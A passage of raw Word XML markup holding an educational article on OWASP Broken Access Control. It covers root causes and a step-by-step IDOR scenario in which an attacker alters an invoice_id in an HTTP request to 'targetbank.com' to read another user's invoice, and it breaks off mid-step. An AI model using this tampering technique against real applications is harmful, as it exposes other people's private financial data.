              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Average</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Coverage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="12F5D6D1" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>42.93%</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7C3EBAA2" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t xml:space="preserve">Testing teams consistently </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>fnd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t xml:space="preserve"> this</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t>vulnerability across nearly half of all security</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t>evaluations, emphasizing its visibility to</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t>attackers.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="20099E9D"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 xml:space="preserve">The exceptional danger of this flaw is reflected in its high </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Average Weighted Exploit score (7.04)</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> paired with a severe </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Impact score (3.84)</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> . Because access control relies heavily on custom business logic rather than plug-and-play code libraries, automated tools struggle to model what "correct" access looks like, leaving wide windows of opportunity for malicious actors to slip through undetected.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C16BCC3" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Core Concept &amp; Mechanics (What &amp; How)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F544281" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Definition</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E883B82"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 xml:space="preserve">According to OWASP, </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Broken Access Control</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> occurs when an application fails to properly enforce policies that restrict users from acting outside of their intended permissions. In a secure system, access control rules ensure that users can only access resources or perform actions that they are explicitly authorized to handle. When this vulnerability is present, these boundaries collapse, allowing unauthorized users to view sensitive data, modify or destroy records, or elevate their privileges to execute restricted administrative business functions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B5FD2C1" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>The "Why"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1624F881"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This vulnerability typically stems from a few fundamental architectural flaws, misconfigurations, or developer oversights:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="235E1DCB" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>"Allow by Default" Architecture:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Instead of denying access to all resources unless explicitly permitted (Deny by Default), applications are frequently designed to allow access to any route or object unless a specific restriction check is explicitly added. If a developer forgets to add that check to a new endpoint, it remains open to the public.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CA9BFAC" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Trusting the Client-Side:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Developers often assume that if a button or link is hidden in the user interface (UI) based on a user's role, the feature is safe. They forget that attackers do not need the UI; they can intercept, craft, or replay HTTP requests directly to the backend server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="472B1BE6" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Insecure Direct Object References (IDOR):</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Applications often expose database keys or internal identifiers directly in URLs or API parameters (e.g., ?id=1001) without verifying if the logged-in user actually owns or has permission to view that specific record.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BDA2E7B" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Centralization Failure:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Access control mechanisms are written ad-hoc across various controllers or API endpoints instead of being handled by a single, centralized, and thoroughly tested security module.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C35FC0C" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>The Mechanics: Step-by-Step Scenario</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E13509F"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To understand how an attacker exploits Broken Access Control, consider an online banking or invoicing platform.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6608ABB1"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Step 1: Reconnaissance &amp; Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75AF8D86"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The attacker logs into their legitimate account (User ID: 8849). They open their browser's Developer Tools (Network Tab) and click on "View My Invoice." They notice the application makes an API request to fetch the invoice data: HTTP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AD540EB" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:t>GET /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:t>/v1/invoices/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:t>fetch?invoice_id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:t>=8849 HTTP/1.1 Host: targetbank.com Authorization: Bearer eyJhbGciOiJIUzI1NiIsIn… (Attacker's valid token)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12285F4D"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Step 2: Crafting the Payload (Parameter Tampering)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31DCBE0D"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 xml:space="preserve">The attacker suspects the system has an IDOR flaw. Using a tool like Postman, Burp Suite, or simply changing the URL in their browser, they modify the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>invoice_id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> parameter to look for another user's invoice (User ID: 8850).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C73D196"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The malicious payload looks like this:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="023C51AB" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:t>HTTP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F15CF6E" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:t>GET /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:t>/v1/invoices/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:t>fetch?invoice_id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:t>=8850 HTTP/1.1 Host: targetbank.com Authorization: Bearer eyJhbGciOiJIUzI1NiIsIn… (Attacker's valid token)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62C3A5A6"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Step 3: Flawed System Processing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06B6B75C"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When the backend server receives this request, it processes it through the following logical sequence:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AA50709" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="00E747AE" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Authentication Check:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> The server reads the Authorization header. It confirms the JWT token is valid and identifies the sender as a logged-in user (User 8849). </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Result: Pass.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="180BAA1B" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>The Missing Check:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> The application </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>fails</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> to perform the critical access control validation step: IF </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>invoice.user_id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> == current_user.id.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12898C60" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Data Query:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> The server executes a database query matching the parameter provided in the request payload:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41DB0C0D" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:t>SQL:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B6A2C03" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="00E747AE" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:t>SELECT * FROM invoices WHERE id = 8850;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0327280A"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Step 4: Exploitation &amp; Outcome</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1037BCE9"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 xml:space="preserve">Because the backend logic blindly trusts the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>invoice_id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
